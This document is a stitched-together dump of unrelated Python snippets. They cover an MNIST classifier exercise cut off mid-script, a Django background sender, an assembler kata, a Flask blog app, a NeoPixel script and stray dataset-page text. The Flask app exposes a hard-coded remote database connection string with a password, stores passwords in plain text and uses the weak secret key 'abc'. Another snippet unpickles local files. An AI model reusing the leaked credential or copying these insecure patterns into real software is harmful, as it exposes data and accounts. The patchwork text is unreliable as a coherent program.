from sklearn.multiclass import OneVsOneClassifier
ovo_clf = OneVsOneClassifier(SGDClassifier(max_iter=5, tol=-np.infty, random_state=42))
ovo_clf.fit(X_train, y_train)
prediction_ovo = ovo_clf.predict([some_digit])
print("OvO prediction:\n", prediction_ovo)
print("Num of training binary classifiers:", len(ovo_clf.estimators_))
# Training a Random Forest Classifier on the full multiclass problem
forest_clf.fit(X_train, y_train)
random_forest_predicted = forest_clf.predict([some_digit])
print("random forest predicted:\n", random_forest_predicted)
# Getting the list of probabilities that the classifier assigned to each class
probabilities_for_each_class = forest_clf.predict_proba([some_digit])
print("probalities for each class:\n", probabilities_for_each_class)
# evaluate SGD on the multiclass task
acc = cross_val_score(sgd_clf, X_train, y_train, cv=3, scoring="accuracy")
print("SGD accuracy:\n", acc)
# Scaling the inputs to increase accuracy
scalar = StandardScaler()
X_train_scaled = scalar.fit_transform(X_train.astype(np.float64))
scaled_score = cross_val_score(sgd_clf, X_train_scaled, y_train, cv=3, scoring="accuracy")
print("This is scaled SGD accuracy:\n", scaled_score)
# Error evaluation using the multiclass confusion matrix
y_train_pred = cross_val_predict(sgd_clf, X_train_scaled, y_train, cv=3)
conf_mat = confusion_matrix(y_train, y_train_pred)
print("Confusion mat:\n", conf_mat)
# confusion_matrix image representation
def plot_confusion_matrix(matrix):
    """Render *matrix* with matshow plus a colorbar.

    Color-and-colorbar alternative to the plain gray plt.matshow used below.
    """
    figure = plt.figure(figsize=(8, 8))
    axes = figure.add_subplot(111)
    image = axes.matshow(matrix)
    figure.colorbar(image)
plt.matshow(conf_mat, cmap=plt.cm.gray)
#save_fig("confusion_matrix_plot", tight_layout=False)
#plt.show()
# Per-class image counts (row totals of the confusion matrix).
row_sums = conf_mat.sum(axis=1, keepdims=True)
# Dividing by the number of images in the corresponding class
# to compare error *rates* instead of absolute numbers of errors.
norm_conf_mx = conf_mat / row_sums
# Fill the diagonal with zeros to keep only the errors.
np.fill_diagonal(norm_conf_mx, 0)
# Rows = actual classes, columns = predicted classes.
plt.matshow(norm_conf_mx, cmap=plt.cm.gray)
#plt.show()
# Multilabel classification: two labels per digit — "large" (>= 7) and "odd".
y_train_large = (y_train >= 7)
y_train_odd = (y_train % 2 == 1)
y_multilabel = np.c_[y_train_large, y_train_odd]
knn_clf = KNeighborsClassifier()
knn_clf.fit(X_train, y_multilabel)
is_large_from7_is_odd = knn_clf.predict([some_digit])
print("(large from 7?,is odd?) knn predictions:\n", is_large_from7_is_odd)
# y_train_knn_pred = cross_val_predict(knn_clf, X_train, y_multilabel, cv=3, n_jobs=-1)
# f1_score(y_multilabel, y_train_knn_pred, average="macro")
# Reuse a previously pickled model/grid-search when both files exist,
# otherwise run the (expensive) grid search and cache the results.
# SECURITY(review): pickle.load executes arbitrary code — only load files
# this script itself produced.
is_exist = os.path.exists("./knn_model.pickle") and os.path.exists("./grid_search.pickle")
if is_exist:
    with open("./knn_model.pickle", "rb") as model_file:
        knn_clf = pickle.load(model_file)
    with open("grid_search.pickle", "rb") as grid_search_file:
        grid_search = pickle.load(grid_search_file)
else:
    # 1. MNIST classifier with over 97% accuracy.
    param_grid = [{'weights': ["uniform", "distance"], 'n_neighbors': [3, 4, 5]}]
    knn_clf = KNeighborsClassifier()
    grid_search = GridSearchCV(knn_clf, param_grid, cv=5, verbose=3, n_jobs=-1)
    grid_search.fit(X_train, y_train)
    # NOTE(review): this pickles the *unfitted* knn_clf; the fitted best
    # estimator lives inside grid_search — confirm that is intended.
    with open("./knn_model.pickle", "wb") as model_file:
        pickle.dump(knn_clf, model_file)
    with open("./grid_search.pickle", "wb") as grid_search_file:
        pickle.dump(grid_search, grid_search_file)
best_param = grid_search.best_params_
print("best knn parameters:", best_param)
y_pred = grid_search.predict(X_test)
accuracy = accuracy_score(y_test, y_pred)
print("this is KNN accuracy score:", accuracy)
# 2.
# Data augmentation
def shift_image(image, dx, dy, shape=(28, 28)):
    """Return a flattened copy of *image* translated by (dx, dy) pixels.

    Parameters
    ----------
    image : 1-D array-like of length shape[0]*shape[1] (a flattened
        grayscale image; array-likes such as lists are accepted too).
    dx, dy : int
        Horizontal / vertical shift in pixels (positive = right / down).
    shape : tuple of int, optional
        2-D image shape. Defaults to MNIST's 28x28 so existing callers
        are unaffected; other resolutions are now supported.

    Pixels shifted in from outside the image are filled with 0 (background).
    """
    # np.asarray generalizes the original (which required an ndarray input).
    image = np.asarray(image).reshape(shape)
    # scipy.ndimage.shift takes offsets in (row, col) = (dy, dx) order.
    shifted_image = shift(image, [dy, dx], cval=0, mode="constant")
    return shifted_image.reshape([-1])
# Augment the training set with four 1-pixel-shifted copies of every image.
X_train_augmented = [image for image in X_train]
y_train_augmented = [label for label in y_train]
for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):
    for image, label in zip(X_train, y_train):
        X_train_augmented.append(shift_image(image, dx, dy))
        y_train_augmented.append(label)
X_train_augmented = np.array(X_train_augmented)
y_train_augmented = np.array(y_train_augmented)
# Shuffle so that the four shifted copies of an image are not adjacent.
shuffle_idx = np.random.permutation(len(X_train_augmented))
X_train_augmented = X_train_augmented[shuffle_idx]
y_train_augmented = y_train_augmented[shuffle_idx]
# Retrain KNN with the grid-search-selected hyperparameters on the
# augmented data and evaluate on the untouched test set.
knn_clf = KNeighborsClassifier(**grid_search.best_params_)
knn_clf.fit(X_train_augmented, y_train_augmented)
y_pred = knn_clf.predict(X_test)
ac_score = accuracy_score(y_test, y_pred)
print("Accuracy:\n", ac_score)
|
import threading
import time
import datetime
from django.conf import settings
from pack_llama import models
from request_service import Request
class PromiseService(object):
    """Background service that periodically retries delivery of unsent packs.

    On construction it spawns a daemon thread that polls the database every
    DB_CHECK_INTERVAL seconds (default 300) and POSTs each unsent Pack's
    message to its queue's destination URL. (Python 2 code.)
    """

    def __init__(self):
        # Poll interval from Django settings, falling back to 5 minutes.
        try:
            self.__interval = settings.DB_CHECK_INTERVAL
        except:
            # NOTE(review): bare except hides unrelated errors;
            # `except AttributeError` would be more precise here.
            self.__interval = 300
        # Daemon thread so it does not keep the process alive at shutdown.
        tr = threading.Thread(target=self.send_packets)
        tr.daemon = True
        tr.start()
        print "Promise Service is started at %s" % (str(datetime.datetime.now()))

    def send_packets(self):
        """Poll forever: send every unsent Pack, then sleep for the interval."""
        while 1:
            print "Thread is still running! time: %s" % (str(datetime.datetime.now()))
            try:
                # All packs not yet delivered.
                packs = models.Pack.objects.filter(is_sent = False)
                if packs.exists():
                    for p in packs.iterator():
                        # NOTE(review): p.message is opened but never closed.
                        p.message.open()
                        # Mark as sent only when the POST reports success.
                        if Request().send(p.queue.destination_url,'POST', str(p.message.read())):
                            p.is_sent = True
                            p.save()
                time.sleep(self.__interval)
            except Exception as ex:
                print "Can't prepare pack for sending to server! ex = %s" % (str(ex))
|
def simple_assembler(program):
    """Interpret a tiny assembler dialect and return the register contents.

    Supported instructions (one per list element, space separated):
      mov x y  -- copy y (constant or register) into register x
      inc x    -- increment register x by one
      dec x    -- decrement register x by one
      jnz x y  -- jump y steps relative to this instruction if x
                  (constant or register) is non-zero

    Returns a dict mapping register names to their final integer values.
    """
    registers = {}

    def value(token):
        # A token is either an integer literal or a register name.
        try:
            return int(token)
        except ValueError:
            return registers[token]

    code = [line.split() for line in program]
    pc = 0  # program counter
    while pc < len(code):
        op, args = code[pc][0], code[pc][1:]
        if op == 'mov':
            registers[args[0]] = value(args[1])
        elif op == 'inc':
            registers[args[0]] += 1
        elif op == 'dec':
            registers[args[0]] -= 1
        elif op == 'jnz':
            # Bug fix: the original compared the raw token to the int 0
            # ("program[cmd][1] == 0" is always False for a string), so a
            # *constant* operand of 0, e.g. 'jnz 0 2', incorrectly jumped.
            if value(args[0]) != 0:
                pc += int(args[1]) - 1  # -1 compensates the pc += 1 below
        pc += 1
    return registers
'''
This is the first part of this kata series. Second part is here.
We want to create a simple interpreter of assembler which will support
the following instructions:
mov x y - copies y (either a constant value or the content of a register)
into register x
inc x - increases the content of register x by one
dec x - decreases the content of register x by one
jnz x y - jumps to an instruction y steps away (positive means forward,
negative means backward), but only if x (a constant or a register) is not zero
Register names are alphabetical (letters only). Constants are always integers
(positive or negative).
Note: the jnz instruction moves relative to itself. For example, an offset of -1
would continue at the previous instruction, while an offset of 2 would skip over
the next instruction.
The function will take an input list with the sequence of the program instructions
and will return a dictionary with the contents of the registers.
Also, every inc/dec/jnz on a register will always be followed by a mov on the
register first, so you don't need to worry about uninitialized registers.
Example
simple_assembler(['mov a 5','inc a','dec a','dec a','jnz a -1','inc a'])
visualized:
mov a 5
inc a
dec a
dec a
jnz a -1
inc a
The above code will:
set register a to 5,
increase its value by 1,
decrease its value by 2,
then decrease its value until it is zero (jnz a -1 jumps to the previous
instruction if a is not zero)
and then increase its value by 1, leaving register a at 1
So, the function should return
{'a': 1}
'''
|
from flask import Flask, render_template, jsonify, request,session,redirect,url_for
from models import *
import os
# Directory (under static/) that user-facing images are served from.
PEOPLE_FOLDER = os.path.join('static', 'img')
app = Flask(__name__)
# app.config["SQLALCHEMY_DATABASE_URI"] = r"postgres://qgorardefomjqz:ebcb07859a907fe7ab36b6738c6e8f4d475e6a5457a4d9c8be656c9350b45e29@ec2-54-161-208-31.compute-1.amazonaws.com:5432/d2metr5n3omthh"
# SECURITY(review): database credentials are hard-coded; move to environment
# variables (the commented-out Heroku URI above also leaks a credential).
app.config["SQLALCHEMY_DATABASE_URI"] = r"postgresql://postgres:1@localhost:5432/project1"
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
app.config['UPLOAD_FOLDER'] = PEOPLE_FOLDER
# SECURITY(review): "abc" is a guessable session-signing key; use a random secret.
app.secret_key = "abc"
db.init_app(app)
# Module-global mutable state: accumulates all "drone" ratings ever posted.
# NOTE(review): shared across all users and requests — confirm intended.
list_drone = []
def main():
    # Create all tables declared on the imported SQLAlchemy models.
    db.create_all()
@app.route("/")
def home():
    """Landing page: show the login form."""
    login_page = render_template("login.html")
    return login_page
@app.route("/login", methods=["POST"])
def register():
    """Create a new account from the posted form, then show the login page.

    Renders an error page instead when the chosen name is already taken.
    """
    name = request.form.get("name")
    password = request.form.get("password")
    # Guard clause: reject duplicate user names up front.
    if User.query.filter_by(name=name).first() is not None:
        return render_template("error.html", message="The name has already existed.")
    # SECURITY(review): the password is stored in plain text — it should be hashed.
    new_user = User(name=name, password=password)
    db.session.add(new_user)
    db.session.commit()
    return render_template("login.html")
@app.route("/home", methods=["POST"])
def login():
    """Authenticate the posted credentials and render the home page.

    On failure the registration page is shown and no session is created.
    """
    name = request.form.get("name")
    password = request.form.get("password")
    # SECURITY(review): passwords are compared in plain text — hash them.
    if User.query.filter_by(name=name, password=password).first() is None:
        return render_template("register.html")
    # Bug fix: only record the logged-in user after the credentials check.
    # The original set session['username'] before the check, so even a
    # failed login left the visitor with an authenticated-looking session.
    session['username'] = name
    full_filename = os.path.join(app.config['UPLOAD_FOLDER'], 'first.jpg')
    return render_template("home.html", user_image=full_filename, name=name)
@app.route("/register")
def turn_back_toregister():
    """Show the registration form."""
    registration_page = render_template("register.html")
    return registration_page
@app.route("/home")
def logout():
    """Clear the session's username and return to the login page.

    NOTE(review): GET /home logs out while POST /home logs in — surprising
    routing, preserved as-is.
    """
    session.pop('username', None)  # no-op if nobody is logged in
    return render_template("login.html")
@app.route('/home2', methods=["POST"])
def searching():
    """Search blogs by the selected field and render the matches.

    Falls back to the home page (with message=False) when nothing matches.
    """
    selection = request.form.get("selection")
    search = request.form.get("search")
    # Map each dropdown choice to the Blog column it filters on.
    field_by_selection = {
        "Users": "Author",
        "Rating": "ratings_count",
        "Title": "title",
        "Date": "date",
    }
    # Bug fix: the original left `results` undefined (UnboundLocalError at
    # the `results == []` check) when `selection` matched no known choice.
    results = []
    field = field_by_selection.get(selection)
    if field is not None:
        results = Blog.query.filter_by(**{field: search}).all()
    if results == []:
        full_filename = os.path.join(app.config['UPLOAD_FOLDER'], 'first.jpg')
        return render_template("home.html", user_image=full_filename, message=False)
    return render_template("resultSearching.html", results=results)
@app.route("/blog/<string:title>",methods=["POST","GET"])
def blogRender(title):
    """Show one blog post (GET) or add a comment plus a rating (POST).

    Requires a logged-in session ('username' must be set); raises KeyError
    otherwise — NOTE(review): no redirect-to-login guard exists here.
    """
    user_name = session['username']
    # title = request.args.get("title")
    if request.method == "GET":
        # Load the post and its comments for display.
        blog = Blog.query.filter_by(title=title).all()
        author = blog[0].Author
        title = blog[0].title
        content = blog[0].content
        comments=Comment.query.filter_by(blog=title).all()
        print("-----------getcomment------------")
        print(comments)
        # message flags whether there are any comments to render.
        message = True
        if len(comments) == 0:
            message = False
        alert = False
        drone = 0
    if request.method == "POST":
        # NOTE(review): the first read ("content") is immediately overwritten
        # by the second ("content_comment") — the first line looks dead.
        content_comment = request.form.get("content")
        content_comment = request.form.get("content_comment")
        # Record the posted rating in the module-global list and show the
        # running average. NOTE(review): list_drone is shared across all
        # posts and users, so this average is site-wide, not per-post.
        drone = request.form.get("drone")
        drone = int(drone)
        list_drone.append(drone)
        drone = sum(list_drone)/ len(list_drone)
        author = request.form.get("author")
        blog = Blog.query.filter_by(title=title).all()[0]
        print("--------------blog---------------")
        print(blog)
        content = blog.content
        print("--------------content---------------")
        print(content)
        comments=Comment.query.filter_by(blog=title).all()
        print("--------------comment---------------")
        print(comments)
        message = True
        # One comment per user across the whole site: alert if this user
        # has commented anywhere before. NOTE(review): the filter is by
        # user only, not (user, blog) — presumably intentional; confirm.
        check_comment = Comment.query.filter_by(user=user_name).all()
        print("--------------check-content---------------")
        print(check_comment)
        if len(check_comment)>0:
            alert = True
        else:
            print(88888888)
            new_comment = Comment(blog=title,content=content_comment,user=user_name)
            db.session.add(new_comment)
            db.session.commit()
            alert = False
        # After a POST the page shows this user's comments, not the blog's.
        comments = Comment.query.filter_by(user=user_name).all()
        print(alert) # return redirect(url_for('blogRender',title=title))
    return render_template("blog.html",title=title,content=content,author=author,comments=comments,message=message,alert=alert,drone=drone)
@app.route("/blog/<int:id>",methods=["GET"])
def blog_api(id):
    """JSON API: return author, title and comment texts for one blog post.

    Responds with a 404 and an error payload when the id does not exist.
    """
    blog = Blog.query.get(id)
    if blog is None:
        return jsonify({"error": "Invalid blog"}), 404
    # Collect the text of every comment attached to this blog.
    # (Fix: removed leftover gibberish debug prints from the original.)
    names = [comment.content for comment in blog.comments]
    return jsonify({
        "Author": blog.Author,
        "Title": blog.title,
        "Comment": names
    })
if __name__ == "__main__":
    # Create the database tables inside an application context.
    # (Fix: removed a stray trailing "|" artifact fused onto main(),
    # which made the line a syntax error.)
    with app.app_context():
        main()
# Read an integer and report whether it is odd (True) or even (False).
# (Fix: removed a stray trailing "|" extraction artifact after the print,
# which made the line a syntax error, and dropped a commented-out
# duplicate of the same check.)
A = int(input("A= "))
print((A % 2) > 0)
import relative_imports.lcls2_pgp_pcie_app.axipcie as axipcie

# Smoke test: exercise the packaged module by invoking its exported func().
axipcie.func()
|
import board
import neopixel
import time  # NOTE(review): imported but unused in the visible code

# Drive a 20-pixel NeoPixel strip wired to GPIO pin D18.
pixels = neopixel.NeoPixel(board.D18, 20)
# Light every other pixel (indices 0, 2, ..., 18) purple (R=128, B=128).
for i in range(10):
    pixels[i*2] = (128,0,128)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.